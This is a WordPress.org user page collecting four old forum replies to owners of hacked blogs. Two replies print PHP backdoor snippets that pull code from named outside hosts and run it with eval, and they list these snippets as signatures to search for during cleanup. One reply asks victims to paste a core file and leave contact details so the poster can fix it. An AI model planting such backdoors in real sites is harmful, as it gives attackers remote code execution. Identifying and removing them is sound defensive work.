Title: evermaster's Replies | WordPress.org

---

# evermaster

  [  ](https://wordpress.org/support/users/evermaster/)

 *   [Profile](https://wordpress.org/support/users/evermaster/)
 *   [Topics Started](https://wordpress.org/support/users/evermaster/topics/)
 *   [Replies Created](https://wordpress.org/support/users/evermaster/replies/)
 *   [Reviews Written](https://wordpress.org/support/users/evermaster/reviews/)
 *   [Topics Replied To](https://wordpress.org/support/users/evermaster/replied-to/)
 *   [Engagements](https://wordpress.org/support/users/evermaster/engagements/)
 *   [Favorites](https://wordpress.org/support/users/evermaster/favorites/)

 Search replies:

## Forum Replies Created

Viewing 4 replies - 1 through 4 (of 4 total)

 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Please Help! My blog is saying “Warning: file_get_contents()”](https://wordpress.org/support/topic/please-help-my-blog-is-saying-warning-file_get_contents/)
 *  [evermaster](https://wordpress.org/support/users/evermaster/)
 * (@evermaster)
 * [17 years, 9 months ago](https://wordpress.org/support/topic/please-help-my-blog-is-saying-warning-file_get_contents/#post-828986)
 * Here is the full list of hijacked domains:
 * [http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=warning+seotoos.info&btnG=Search](http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=warning+seotoos.info&btnG=Search)
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Please Help! My blog is saying “Warning: file_get_contents()”](https://wordpress.org/support/topic/please-help-my-blog-is-saying-warning-file_get_contents/)
 *  [evermaster](https://wordpress.org/support/users/evermaster/)
 * (@evermaster)
 * [17 years, 9 months ago](https://wordpress.org/support/topic/please-help-my-blog-is-saying-warning-file_get_contents/#post-828830)
 * Your blog was highjacked and you must have webshells installed on your blog as
   well. I can help you, please cut and paste your
 * /home/content/m/u/s/musicisartx/html/wp-includes/general-template.php here
 * I will fix it for you. If you want me to remove shells – let me know – leave 
   your contact information here as well.
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [WordPress Hacked and Redirected … Again](https://wordpress.org/support/topic/wordpress-hacked-and-redirected-again/)
 *  [evermaster](https://wordpress.org/support/users/evermaster/)
 * (@evermaster)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-hacked-and-redirected-again/page/4/#post-781813)
 * Those are VERY dangerous:
 * Make sure you scan ALL your files for following words in your code:
 *     ```
       if(isset($_GET['p'])) {
           $sock = @fsockopen('km20725.keymachine.de', 80);
           if($sock){
           fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
           fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
           while($content[] = fgets ($sock));
           $content = implode('', $content);
           @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
           fclose ($sock);}
       }
       ```
   
 *     ```
       if(isset($_GET['p'])) {
           @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
       }
       ```
   
 *     ```
       if(isset($_GET['p'])) {
           @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
       }
       ```
   
 * `
    eval(gzinflate(base64_decode(  words:
 * k1b0rg in any of your files.
 * Once found clean it up!
 * hey and dont forget to send nice abuse emails to ISP of those guys:
 * km20725.keymachine.de
    beliy.us seogoogle.us
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [I was hacked](https://wordpress.org/support/topic/i-was-hacked-1/)
 *  [evermaster](https://wordpress.org/support/users/evermaster/)
 * (@evermaster)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/i-was-hacked-1/page/2/#post-776566)
 * Those are VERY dangerous:
 * Make sure you scan ALL your files for following words in your code:
 *     ```
       if(isset($_GET['p'])) {
           $sock = @fsockopen('km20725.keymachine.de', 80);
           if($sock){
           fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
           fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
           while($content[] = fgets ($sock));
           $content = implode('', $content);
           @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
           fclose ($sock);}
       }
       ```
   
 *     ```
       if(isset($_GET['p'])) {
           @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
       }
       ```
   
 *     ```
       if(isset($_GET['p'])) {
           @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
       }
       ```
   
 *     ```
       eval(gzinflate(base64_decode(
       ```
   
 * words:
 * k1b0rg in any of your files.
 * Once found clean it up!
 * If you have broken fingers and want someone to clean it up for you – ring me 
   a bell : icq 119655677
 * hey and dont forget to send nice abuse emails to ISP of those guys:
 * km20725.keymachine.de
    beliy.us seogoogle.us

Viewing 4 replies - 1 through 4 (of 4 total)